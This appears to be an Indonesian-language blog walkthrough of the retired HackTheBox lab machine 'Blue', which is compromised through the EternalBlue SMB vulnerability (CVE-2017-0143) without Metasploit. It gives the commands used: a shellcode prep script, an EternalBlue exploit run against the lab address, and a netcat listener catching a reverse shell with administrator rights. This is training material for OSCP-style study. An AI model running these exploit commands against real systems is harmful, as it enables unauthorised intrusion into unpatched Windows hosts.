HACKTHEBOX WALKTROUGH

Blue Machine

CVE 2017–0143 (Without Metasploit)

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Blue” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Result Nmap :

Gist 1

Notes :

Diketahui berdasarkan hasil scanning dari nmap bahwa smb service memiliki vulnerability CVE 2017–0143.

Exploit

Kemudian penulis menjalankan exploit.

# bash shell_prep.sh

Gambar 1

# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin

Setelah menjalankan exploit eternalblue untuk exploit windows 7, dilanjuti penulis dengan menjalankan listener pada port 888.

# nc -lvvp 888

Gambar 2

Gambar 3

Penulis berhasil mendapatkan shell dengan privilege administrator.

Kesimpulan

Mesin ini Blue sama dengan mesin Legacy di tulisan sebelumnya. Penulis tidak menemukan perbedaan challanges, dan pola.

Reference

3ndG4me/AutoBlue-MS17-010

Target

52 mesin lagi !